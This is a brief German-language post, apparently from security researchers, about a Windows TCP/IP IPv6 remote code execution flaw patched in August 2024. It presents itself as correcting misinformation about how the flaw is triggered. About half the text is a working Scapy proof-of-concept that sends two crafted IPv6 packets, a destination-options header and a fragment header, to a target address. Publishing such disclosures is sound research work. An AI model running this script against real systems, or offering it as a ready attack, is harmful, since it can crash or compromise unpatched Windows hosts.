
Im August 2024 veröffentlichte Microsoft einen Patch für eine Windows-TCP/IP-Schwachstelle, die Remote-Codeausführung (RCE) ermöglicht. Einige Forscher haben bereits Machbarkeitsnachweise (PoC) für diese Schwachstelle veröffentlicht, und etwa zur gleichen Zeit haben auch die Forscher von PatchPoint ihre Analyse und Reproduktion dieses Problems abgeschlossen. Aufgrund der Verbreitung von Fehlinformationen auf verschiedenen Plattformen, einschließlich Twitter, scheinen die kritischen Punkte, die zum Auslösen dieser Schwachstelle erforderlich sind, missverstanden worden zu sein. Entgegen diesen Ungenauigkeiten haben wir uns entschlossen, einen PoC zu veröffentlichen, der zeigt, wie diese Schwachstelle mit dem Senden von nur zwei Paketen ausgelöst werden kann.; In Wirklichkeit ist eine große Anzahl von Paketen nicht notwendig, um diese Schwachstelle auszulösen.
from scapy.all import *
IPAddr = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX
ExtHdrDestOpt = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)

※ Um die Schwachstelle auszulösen, ist eine Wartezeit von ungefähr 60 Sekunden erforderlich